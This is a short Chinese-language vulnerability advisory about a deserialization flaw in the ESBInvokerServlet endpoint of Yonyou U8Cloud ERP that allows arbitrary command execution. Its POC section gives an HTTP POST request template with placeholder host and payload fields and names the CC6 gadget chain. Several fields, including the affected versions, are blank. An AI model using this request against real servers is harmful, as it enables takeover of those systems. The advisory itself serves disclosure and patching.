0x00 漏洞编号
0x01 危险等级
0x02 漏洞概述
用友U8Cloud是用友推出的新一代云ERP,主要聚焦成长型、创新型企业,提供企业级云ERP整体解决方案。
0x03 漏洞详情
**漏洞类型:**反序列化
**影响:**执行任意命令
**简述:**用友U8Cloud系统的ESBInvokerServlet接口存在反序列化漏洞,攻击者可通过该漏洞执行任意命令,进而接管整个服务器。
0x04 影响版本
0x05 POC
`POST /servlet/ESBInvokerServlet HTTP/1.1``Host: {{Hostname}}``User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36``Accept:``text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng, */*;q=0.8,application/signed-exchange;v=b3;q=0.7`` ``# cc6链``{{payload}}`
仅供安全研究与学习之用,若将工具做其他用途,由使用者承担全部法律及连带责任,作者及发布者不承担任何法律及连带责任。
0x06 修复建议
目前官方已发布漏洞修复版本,建议用户升级到安全版本******:******